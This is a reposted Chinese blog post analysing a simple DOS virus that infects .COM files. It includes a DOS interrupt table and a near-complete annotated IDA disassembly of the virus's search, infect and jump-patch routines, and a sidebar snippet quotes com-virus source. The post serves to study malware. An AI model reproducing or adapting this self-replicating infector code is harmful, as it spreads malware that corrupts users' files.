菜鸟的病毒分析 超菜 dos 蹩脚的.com文件感染病毒的分析

最新推荐文章于 2020-07-31 14:31:18 发布
最新推荐文章于 2020-07-31 14:31:18 发布
阅读量360 收藏 1
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/maixiaokou/archive/2012/07/03/2574117.html
版权
dos 蹩脚的.com文件感染病毒的分析
病毒行为:感染com文件就这么蹩脚 第一次做分析 原谅我如此之菜吧
流程:恢复已感染文件的头三个字节 查找.com后缀文件 判断是否是真实的com文件 如果是打开文件 保存前三个字节属性等信息 添加病毒代码 添加跳转 恢复属性等关闭文件
下面是用到的中断 psp dta结构可以去看雪上查查
0F 打开文件 DS:DX=FCB首地址 AL=00 文件找到
AL=FF 文件未找到
10 关闭文件 DS:DX=FCB首地址 AL=00 目录修改成功
AL=FF 目录中未找到文件
11 查找第一个目录项 DS:DX=FCB首地址 AL=00 找到
AL=FF 未找到
12 查找下一个目录项 DS:DX=FCB首地址
(文件中带有*或?) AL=00 找到
AL=FF 未找到
13 删除文件 DS:DX=FCB首地址 AL=00 删除成功

1A 置DTA地址 DS:DX=DTA地址  
3D 打开文件 DS:DX=ASCIIZ串地址
AL=0 读
=1 写
=3 读/写 成功:AX=文件代号
错误:AX=错误码
3E 关闭文件 BX=文件代号 失败:AX=错误码
3F 读文件或设备 DS:DX=数据缓冲区地址
BX=文件代号
CX=读取的字节数 读成功:
AX=实际读入的字节数
AX=0 已到文件尾
读出错:AX=错误码
40 写文件或设备 DS:DX=数据缓冲区地址
BX=文件代号
CX=写入的字节数 写成功:
AX=实际写入的字节数
写出错:AX=错误码
移动文件指针 BX=文件代号
CX:DX=位移量
AL=移动方式(
  0:从文件头绝对位移,
  1:从当前位置相对移动,
  2:从文件尾绝对位移) 成功:DX:AX=新文件指针位置
出错:AX=错误码
43 置/取文件属性 DS:DX=ASCIIZ串地址
AL=0 取文件属性
AL=1 置文件属性
CX=文件属性 成功:CX=文件属性
失败:CX=错误码
查找第一个匹配文件 DS:DX=ASCIIZ串地址
CX=属性 AX=出错代码(02,18)
4F 查找下一个匹配文件 DS:DX=ASCIIZ串地址
(文件名中带有?或*) AX=出错代码(18)
*******************************************************
反汇编代码
seg000:0000 ;
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ; | This file is generated by The Interactive Disassembler (IDA) |
seg000:0000 ; | Copyright (c) 2007 by DataRescue sa/nv, < ida@datarescue.com> |
seg000:0000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ;
seg000:0000 ; Input MD5 : 68EA3D890A82121CD27F3A109F6E588D
seg000:0000
seg000:0000 ; File Name : E:\MASM\r.exe
seg000:0000 ; Format : MS-DOS executable (EXE)
seg000:0000 ; Base Address: 1000h Range: 10000h-102B9h Loaded length: 2B9h
seg000:0000 ; Entry Point : 1000:100
seg000:0000
seg000:0000 .686p
seg000:0000 .mmx
seg000:0000 .model large
seg000:0000
seg000:0000 ; ===========================================================================
seg000:0000
seg000:0000 ; Segment type: Pure code
seg000:0000 seg000 segment byte public 'CODE' use16
seg000:0000 assume cs:seg000
seg000:0000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:0000 db 100h dup(0)
seg000:0100 assume ss:seg000, ds:nothing
seg000:0100 ; [00000003 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
seg000:0103
seg000:0103 ; =============== S U B R O U T I N E =======================================
seg000:0103
seg000:0103 ; Attributes: bp-based frame
seg000:0103
seg000:0103 start_0 proc near
seg000:0103
seg000:0103 var_6 = word ptr -6
seg000:0103 arg_156 = byte ptr 158h
seg000:0103 arg_220 = byte ptr 222h
seg000:0103 arg_226 = byte ptr 228h
seg000:0103 current_dta = byte ptr 232h
seg000:0103 current_dir = byte ptr 25Dh
seg000:0103 count = byte ptr 29Eh
seg000:0103
seg000:0103 mov bp, sp
seg000:0105 int 3 ; Trap to Debugger
seg000:0106 mov bp, [bp+var_6]
seg000:0109 sub bp, 106h ; 重定位 ,使得能在其他文件中运行自己的代码
seg000:010D mov dl, 0
seg000:010F mov ah, 47h ; 'G'
seg000:0111 lea si, [bp+current_dir]
seg000:0115 int 21h ; DOS - 2+ - GET CURRENT DIRECTORY
seg000:0115 ; DL = drive (0=default, 1=A, etc.)
seg000:0115 ; DS:SI points to 64-byte buffer area
seg000:0117 lea dx, [bp+current_dta]
seg000:011B mov ah, 1Ah
seg000:011D int 21h ; DOS - SET DISK TRANSFER AREA ADDRESS
seg000:011D ; DS:DX -> disk transfer buffer
seg000:011F mov di, 100h
seg000:0122 push di
seg000:0123 lea si, [bp+arg_156] ; 写数据,恢复被感染文件的头
seg000:0127 movsb
seg000:0128 movsw
seg000:0129 mov [bp+count], 0
seg000:012E
seg000:012E loc_1012E: ; CODE XREF: start_0+41j
seg000:012E lea dx, [bp+arg_220] ; .com
seg000:012E ;
seg000:0132 call sub_1015B
seg000:0135 cmp [bp+count], 3
seg000:013A jnb short loc_10146 ; 返回元目录 设置回原始DTA
seg000:013C mov ah, 3Bh ; ';'
seg000:013E lea dx, [bp+arg_226] ; ..转换到上一层目录
seg000:0142 int 21h ; DOS - 2+ - CHANGE THE CURRENT DIRECTORY (CHDIR)
seg000:0142 ; DS:DX -> ASCIZ directory name (may include drive)
seg000:0144 jnb short loc_1012E ; 感染,够数跳到下面
seg000:0146
seg000:0146 loc_10146: ; CODE XREF: start_0+37j
seg000:0146 lea si, [bp+current_dir] ; 返回元目录 设置回原始DTA
seg000:014A mov ah, 3Bh ; ';'
seg000:014C xchg dx, si
seg000:014E int 21h ; DOS - 2+ - CHANGE THE CURRENT DIRECTORY (CHDIR)
seg000:014E ; DS:DX -> ASCIZ directory name (may include drive)
seg000:0150 mov dx, 80h ; '€'
seg000:0153 mov ah, 1Ah
seg000:0155 int 21h ; DOS - SET DISK TRANSFER AREA ADDRESS
seg000:0155 ; DS:DX -> disk transfer buffer
seg000:0157
seg000:0157 locret_10157: ; CODE XREF: sub_1015B+7j
seg000:0157 ; sub_1015B+1Cj
seg000:0157 retn
seg000:0157 start_0 endp ; sp-analysis failed
seg000:0157
seg000:0158 ; ---------------------------------------------------------------------------
seg000:0158 int 20h ; DOS - PROGRAM TERMINATION
seg000:0158 ; returns to DOS--identical to INT 21/AH=00h
seg000:0158 ; ---------------------------------------------------------------------------
seg000:015A db 0
seg000:015B
seg000:015B ; =============== S U B R O U T I N E =======================================
seg000:015B
seg000:015B
seg000:015B sub_1015B proc near ; CODE XREF: start_0+2Fp
seg000:015B mov ah, 4Eh ; 'N'
seg000:015D mov cx, 7 ; 查找所有类型文件
seg000:0160
seg000:0160 loc_10160: ; CODE XREF: sub_1015B+11j
seg000:0160 ; sub_1015B+BCj
seg000:0160 int 21h ; DOS - 2+ - FIND FIRST ASCIZ (FINDFIRST)
seg000:0160 ; CX = search attributes
seg000:0160 ; DS:DX -> ASCIZ filespec
seg000:0160 ; (drive, path, and wildcards allowed)
seg000:0162 jb short locret_10157
seg000:0164 cmp word ptr [bp+255h], 444Eh
seg000:016A mov ah, 4Fh ; 'O' ; 查找下一个文件
seg000:016C jz short loc_10160
seg000:016E lea dx, [bp+250h] ; 文件名放到250h
seg000:0172 mov ax, 4300h
seg000:0175 int 21h ; DOS - 2+ - GET FILE ATTRIBUTES
seg000:0175 ; DS:DX -> ASCIZ file name or directory
seg000:0175 ; name without trailing slash
seg000:0177 jb short locret_10157
seg000:0179 push cx
seg000:017A push dx
seg000:017B mov ax, 4301h
seg000:017E push ax
seg000:017F xor cx, cx ; 设置属性为读写
seg000:0181 int 21h ; DOS - 2+ - SET FILE ATTRIBUTES
seg000:0181 ; DS:DX -> ASCIZ file name
seg000:0181 ; CX = file attribute bits
seg000:0183 lea dx, [bp+250h]
seg000:0187 mov ax, 3D02h
seg000:018A int 21h ; DOS - 2+ - OPEN DISK FILE WITH HANDLE
seg000:018A ; DS:DX -> ASCIZ filename
seg000:018A ; AL = access mode
seg000:018A ; 2 - read & write
seg000:018C xchg ax, bx
seg000:018D mov ax, 5700h
seg000:0190 int 21h ; DOS - 2+ - GET FILE'S DATE/TIME
seg000:0190 ; BX = file handle
seg000:0192 push cx
seg000:0193 push dx
seg000:0194 mov ah, 3Fh ; '?'
seg000:0196 mov cx, 1Ah ; 读1a个字节
seg000:0199 lea dx, [bp+29Fh]
seg000:019D int 21h ; DOS - 2+ - READ FROM FILE WITH HANDLE
seg000:019D ; BX = file handle, CX = number of bytes to read
seg000:019D ; DS:DX -> buffer
seg000:019F xor cx, cx
seg000:01A1 xor dx, dx
seg000:01A3 mov ax, 4202h
seg000:01A6 int 21h ; DOS - 2+ - MOVE FILE READ/WRITE POINTER (LSEEK)
seg000:01A6 ; AL = method: offset from end of file
seg000:01A8 cmp word ptr [bp+29Fh], 5A4Dh ; mz开头那么不是com文件
seg000:01AE jz short loc_101BC
seg000:01B0 mov cx, [bp+2A0h]
seg000:01B4 add cx, 132h
seg000:01B8 cmp ax, cx ; 判断是否被感染
seg000:01BA jl short loc_101BE
seg000:01BC
seg000:01BC loc_101BC: ; CODE XREF: sub_1015B+53j
seg000:01BC ; sub_1015B+66j
seg000:01BC jmp short loc_10205
seg000:01BE ; ---------------------------------------------------------------------------
seg000:01BE
seg000:01BE loc_101BE: ; CODE XREF: sub_1015B+5Fj
seg000:01BE cmp ax, 0FE49h
seg000:01C1 ja short loc_101BC
seg000:01C3 lea di, [bp+158h]
seg000:01C7 lea si, [bp+29Fh]
seg000:01CB movsb
seg000:01CC movsw
seg000:01CD sub ax, 3
seg000:01D0 mov [bp+2A0h], ax
seg000:01D4 mov dl, 0E9h ; '? ; jmp
seg000:01D4 ;
seg000:01D6 mov [bp+29Fh], dl
seg000:01DA mov ah, 9
seg000:01DC mov dx, [bp+22Bh]
seg000:01E0 int 21h ; DOS - PRINT STRING
seg000:01E0 ; DS:DX -> string terminated by "$"
seg000:01E2 lea dx, [bp+103h]
seg000:01E6 mov cx, 12Fh ; 病毒写入文件
seg000:01E9 mov ah, 40h
seg000:01EB int 21h ; DOS - 2+ - WRITE TO FILE WITH HANDLE
seg000:01EB ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
seg000:01ED mov ax, 4200h
seg000:01F0 xor dx, dx
seg000:01F2 xor cx, cx
seg000:01F4 int 21h ; DOS - 2+ - MOVE FILE READ/WRITE POINTER (LSEEK)
seg000:01F4 ; AL = method: offset from beginning of file
seg000:01F6 mov cx, 3
seg000:01F9 lea dx, [bp+29Fh] ; 在头上写跳转指令
seg000:01FD mov ah, 40h
seg000:01FF int 21h ; DOS - 2+ - WRITE TO FILE WITH HANDLE
seg000:01FF ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
seg000:0201 inc byte ptr [bp+29Eh]
seg000:0205
seg000:0205 loc_10205: ; CODE XREF: sub_1015B:loc_101BCj
seg000:0205 mov ax, 5701h
seg000:0208 pop dx
seg000:0209 pop cx
seg000:020A int 21h ; DOS - 2+ - SET FILE'S DATE/TIME
seg000:020A ; BX = file handle, CX = time to be set
seg000:020A ; DX = date to be set
seg000:020C mov ah, 3Eh
seg000:020E int 21h ; DOS - 2+ - CLOSE A FILE WITH HANDLE
seg000:020E ; BX = file handle
seg000:0210 pop ax
seg000:0211 pop dx
seg000:0212 pop cx
seg000:0213 int 21h ; DOS -
seg000:0215 mov ah, 4Fh ; 'O'
seg000:0217 jmp loc_10160
seg000:0217 sub_1015B endp
seg000:0217
seg000:0217 ; ---------------------------------------------------------------------------
seg000:021A word_1021A dw 505Bh
seg000:021C db 53h ; S
seg000:021D db 2Fh ; /
seg000:021E db 47h ; G
seg000:021F db 0FDh ; ?
seg000:0220 db 5Dh ; ]
seg000:0221 db 0
seg000:0222 db 2Ah ; *
seg000:0223 db 2Eh ; .
seg000:0224 db 43h ; C
seg000:0225 db 4Fh ; O
seg000:0226 db 4Dh ; M
seg000:0227 db 0
seg000:0228 db 2Eh ; .
seg000:0229 db 2Eh ; .
seg000:022A db 0
seg000:022B db 69h ; i
seg000:022C db 6Eh ; n
seg000:022D db 66h ; f
seg000:022E db 65h ; e
seg000:022F db 63h ; c
seg000:0230 db 74h ; t
seg000:0231 db 0
seg000:0232 db 0
seg000:0233 db 0
seg000:0234 db 0
seg000:0235 db 0
seg000:0236 db 0
seg000:0237 db 0
seg000:0238 db 0
seg000:0239 db 0
seg000:023A db 0
seg000:023B db 0
seg000:023C db 0
seg000:023D db 0
seg000:023E db 0
seg000:023F db 0
seg000:0240 db 0
seg000:0241 db 0
seg000:0242 db 0
seg000:0243 db 0
seg000:0244 db 0
seg000:0245 db 0
seg000:0246 db 0
seg000:0247 db 0
seg000:0248 db 0
seg000:0249 db 0
seg000:024A db 0
seg000:024B db 0
seg000:024C db 0
seg000:024D db 0
seg000:024E db 0
seg000:024F db 0
seg000:0250 unk_10250 db 0
seg000:0251 db 0
seg000:0252 db 0
seg000:0253 db 0
seg000:0254 db 0
seg000:0255 unk_10255 db 0
seg000:0256 db 0
seg000:0257 db 0
seg000:0258 db 0
seg000:0259 db 0
seg000:025A db 0
seg000:025B db 0
seg000:025C db 0
seg000:025D db 0
seg000:025E db 0
seg000:025F db 0
seg000:0260 db 0
seg000:0261 db 0
seg000:0262 db 0
seg000:0263 db 0
seg000:0264 db 0
seg000:0265 db 0
seg000:0266 db 0
seg000:0267 db 0
seg000:0268 db 0
seg000:0269 db 0
seg000:026A db 0
seg000:026B db 0
seg000:026C db 0
seg000:026D db 0
seg000:026E db 0
seg000:026F db 0
seg000:0270 db 0
seg000:0271 db 0
seg000:0272 db 0
seg000:0273 db 0
seg000:0274 db 0
seg000:0275 db 0
seg000:0276 db 0
seg000:0277 db 0
seg000:0278 db 0
seg000:0279 db 0
seg000:027A db 0
seg000:027B db 0
seg000:027C db 0
seg000:027D db 0
seg000:027E db 0
seg000:027F db 0
seg000:0280 db 0
seg000:0281 db 0
seg000:0282 db 0
seg000:0283 db 0
seg000:0284 db 0
seg000:0285 db 0
seg000:0286 db 0
seg000:0287 db 0
seg000:0288 db 0
seg000:0289 db 0
seg000:028A db 0
seg000:028B db 0
seg000:028C db 0
seg000:028D db 0
seg000:028E db 0
seg000:028F db 0
seg000:0290 db 0
seg000:0291 db 0
seg000:0292 db 0
seg000:0293 db 0
seg000:0294 db 0
seg000:0295 db 0
seg000:0296 db 0
seg000:0297 db 0
seg000:0298 db 0
seg000:0299 db 0
seg000:029A db 0
seg000:029B db 0
seg000:029C db 0
seg000:029D db 0
seg000:029E db 0
seg000:029F db 0
seg000:02A0 db 0
seg000:02A1 db 0
seg000:02A2 db 0
seg000:02A3 db 0
seg000:02A4 db 0
seg000:02A5 db 0
seg000:02A6 db 0
seg000:02A7 db 0
seg000:02A8 db 0
seg000:02A9 db 0
seg000:02AA db 0
seg000:02AB db 0
seg000:02AC db 0
seg000:02AD db 0
seg000:02AE db 0
seg000:02AF db 0
seg000:02B0 db 0
seg000:02B1 db 0
seg000:02B2 db 0
seg000:02B3 db 0
seg000:02B4 db 0
seg000:02B5 db 0
seg000:02B6 db 0
seg000:02B7 db 0
seg000:02B8 db 0
seg000:02B8 seg000 ends
seg000:02B8
seg000:02B8
seg000:02B8 end start

 

转载于:https://www.cnblogs.com/maixiaokou/archive/2012/07/03/2574117.html

abcd8080
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DOS命令大全
06-20 5211
分享一个DOS命令集合 DOS, 命令, 分享 相关词条:DOS, 命令, 分享   我也想创建词条赚积分 目的:只是想把一些基础的东西整理一下,这样大家以后遇到累似的问题,可以到这里查询。如果大家还有其他的东西,拿出来分享啊~大家一起学习~ 命令提示符下的常用命令 net start和net stop 来开启和关闭服务 Windows快捷键大全 捆绑文件 文件扩展名 端口 8088
emu8086汇编语言操作文件指令详解
qq_70311979的博客
05-15 2027
总结emu8085汇编语言对文件进行打开、关闭、读入和写入,并附有代码示例
com感染病毒分析
笔记本
04-02 2234
先附上com病毒的源码 virus.asm CSEG SEGMENT ASSUME CS:CSEG,DS:CSEG,SS:CSEG main PROC NEAR mainstart: CALL vstart vstart: POP SI MOV BP,SI PUSH SI MOV AH,9 ADD SI,OFFSET message-OFFSET vstart MOV DX,S...
常见文件文件
Forever.Sun
07-31 3428
在日常生活中我们接触到很多软件,如QQ和微信等,这些软件都会对一些文件加密如图片加密成dat文件,这其中多数是利用文件的16进制编码进行异或运算进行加密。此处我们具体介绍一些常见的文件未进行加密前的文件头进行列举:[ {"扩展名":123,"文件头标识(HEX)":"00001A00051004","文件描述":"Lotus1-2-3spreadsheet(v9)file"}, {...
计算机病毒感染机制
不忘初心,护天下安全!
02-14 2161
0x01 引导型病毒 引导型病毒指针对主引导扇区和磁盘引导进行感染的计算机病毒,利用系统引导师部队驻引导区的内容正确与否进行判别的缺点,在系统引导的过程中侵入系统。 其思路是病毒代码通过修改或直接替换引导扇区代码的方式完成对目标系统感染,按照系统的引导过程,机器下次引导时会自动执行处于引导扇区中的病毒代码。 引导型病毒的特点是隐蔽性强、兼容性强、传播速度慢。 基于Windows的系统引导过...
谁说菜鸟不懂数据分析解读专题培训课件.ppt
12-20
谁说菜鸟不懂数据分析解读专题培训课件.ppt
菜鸟数据分析工具篇-思维导图.jpg
05-15
菜鸟数据分析工具篇-思维导图.jpg
超级菜鸟如何入门数据分析.docx
04-26
超级菜鸟如何入门数据分析.docx
113谁说菜鸟不会数据分析(完整)(ppt文档).pptx
12-18
113谁说菜鸟不会数据分析(完整)(ppt文档).pptx
谁说菜鸟不会数据分析(.入门篇)].张文霖.全彩版.pdf
07-22
谁说菜鸟不会数据分析(.入门篇)].张文霖.全彩版.pdf
菜鸟病毒分析2
abcd8080的博客
07-03 200
dos 运行期.exe文件感染病毒 还是如此的菜原谅我吧 病毒行为:感染.com文件 修改被感染文件的SS:SP流程:恢复被感染文件的 cs:ip ss:sp 搜索.exe 如果是正确的.exe文件并且没有被感染过 ,打开文件保存文件信息 ,进行感染修改测试:ip ss:sp, 添加病毒代码 ,恢复文件信息 ,关闭文件用到的中断与上篇.com文件感染相同doscom文件与exe文件...
Windows API是什么?
weixin_34327761的博客
11-15 127
Win32程序是构筑在Win32 API基础上的。在Win32 API中,包括了大量的函数、结构和消息等,它不仅为应用程序所调用,也是Windows自身的一部分,Windows自身的运行也调用这些API函数。   Windows API的来历 ============== 在DOS下,操作系统的功能是通过各种软中断来实现的。 如大家都知道int 21h是DOS中断,int 13h和int...
[转]失业的娱乐-IDA逆向工程入门
c_cacal的专栏
10-10 1万+
【文章标题】: 失业的娱乐-IDA逆向工程入门(一)【文章作者】: layper【作者邮箱】: layper@yahoo.com.cn【作者主页】: http://blog.csdn.net/layper/【下载地址】: 自己搜索下载【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!-------------------------------------------------
PE文件学习笔记(一):DOS头与PE头解析
热门推荐
Apollon_krj的博客
08-10 1万+
在Windows下所谓PE文件即Portable Executable,意为可移植的可执行的文件。常见的.EXE、.DLL、.OCX、.SYS、.COM都是PE文件。PE文件有一个共同特点:前两个字节为4D 5A(MZ)。如果一个文件前两个字节不是4D 5A则其肯定不是可执行文件。比如用16进制文本编辑器打开一个“.xls”文件其前两个字节为:0XD0 0XCF;打开一个“.pdf”其前两个字节为
汇编程序(2)
crkres9527
09-10 717
firstwindows源码      ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   ; Sample code for    ; by 罗云彬, http://asm.yeah.net   ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
病毒分析工具和使用方法(一)
lirunling的博客
11-13 1万+
加壳验证工具 所谓病毒加壳,是指经过系列数学运算,将可执行程序文件或动态链接库文件的编码进行改变(目前还有一些加壳软件可以压缩、加密驱动程序),以达到缩小文件体积或加密程序编码,从而使病毒文件逃过杀毒软件的查杀。查看文件是否加壳最常用的工具是PEiD。 PEiD(PE Identifier)是一款著名的查壳工具,其功能强大,几乎可以侦测出所有的壳,其数量已超过470 种PE 文档 的加壳类型和...
PE结构-Dos头部
小喇叭儿滴滴的吹
02-10 358
啥是PE结构?简单来说,就是将代码和数据按照一定的约定进行存放,为进程的创建做准备。 微软当初在设计PE结构时,目标是设计成多平台的,所以里面很多字段考虑了跨平台因数,当然现在来看,这个跨平台...en..就不用多说啥了。 先来了解一下PE结构的大概情况 IMAGE_DOS_HEADER //DOS头 IMAGE_NT_HEADERS //NT头 DWORD Signature /...
菜鸟驿站数据库需求分析
最新发布
05-21
菜鸟驿站作为一家快递代收点,需要建立一个数据库来管理其业务数据。以下是可能的数据库需求分析: 1. 快递信息管理:包括快递单号、寄件人、收件人、寄件时间、收件时间、快递状态等信息。可以通过快递单号进行查询、修改、删除等操作。 2. 收寄件人信息管理:包括姓名、电话、地址等信息。可以通过姓名、电话、地址等关键字进行查询、修改、删除等操作。 3. 员工信息管理:包括员工编号、姓名、联系方式、职位等信息。可以进行员工信息的添加、查询、修改、删除等操作。 4. 收费标准管理:菜鸟驿站需要对快递服务进行收费,可以设定不同规格快递的收费标准,同时也可以对快递服务进行折扣等促销活动。 5. 统计分析功能:通过数据库可以对快递服务的情况进行统计分析,例如各类快递的数量、收费金额等,方便管理者进行业务决策。 6. 安全管理:数据库应该具有一定的安全性能,例如用户权限管理、备份与恢复等功能,保证数据的安全性和完整性。 7. 系统管理:菜鸟驿站的数据库系统应该具有一定的易用性和可维护性,例如备份与恢复、日志管理、性能监控等功能,方便管理员进行系统管理和维护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值